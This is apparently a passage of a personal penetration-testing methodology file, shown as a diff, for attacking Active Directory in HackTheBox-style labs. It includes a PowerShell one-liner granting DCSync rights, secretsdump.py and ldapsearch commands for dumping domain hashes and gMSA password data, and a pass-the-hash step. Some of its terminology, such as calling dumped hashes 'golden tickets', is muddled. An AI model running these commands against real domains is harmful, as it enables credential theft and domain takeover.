AlienX2001/methodology-boxes/Active Directory enum.md

 If the Link says WriteDacl and the abuse info says that we can do a dcsync attack then we can simply type this oneliner `Add-DomainGroupMember -Identity 'GROUP NAME' -Members USERNAME; $username = "HOSTNAME\USERNAME"; $password = "PASSWORD"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'USERNAME' -TargetIdentity 'DOMAINNAME\Domain Admins' -Rights DCSync`.

 And after that simply use secretsdump.py from impacket to get kerberos golden tickets of the accounts due to the nature of DCSync attack by using `secretsdump.py USERNAME:PASSWORD@DC IP`

+### ReadGMSAPassword

+If our owned user(AD object) has ReadGMSAPassword privelage for a GMSA(Group Managed Service Account), then usually its a high value target, due to as follows https://cube0x0.github.io/Relaying-for-gMSA/, so understanding this article, we see sometimes the GMSA is usually granted more rights than what it needs, hence it is in our best interest to own them.
+The article describes on how to do it if you have a shell with the account.
+But in intelligence from htb, we didnt have shell, so we used ldapsearch to gain info on it, using the following syntax `ldapsearch -x -b "DISTINGUISHED NAME OF THE TARGET GMSA RETRIEVED FROM BLOODHOUND" -H "ldap://DC IP" -D "DISTINGUISHED NAME OF THE OWNED ACCOUNT WHICH HAS THE RIGHTS" -w "PASSWORD OF THE OWNED ACCOUNT" "objectclass=*"`.

 ## Lastly
 The 2nd part of the golden ticket will be the hash required for a pass the hash attack, which we may use to get access via evilwinrm or we might try to crack it, to get cleartext passwords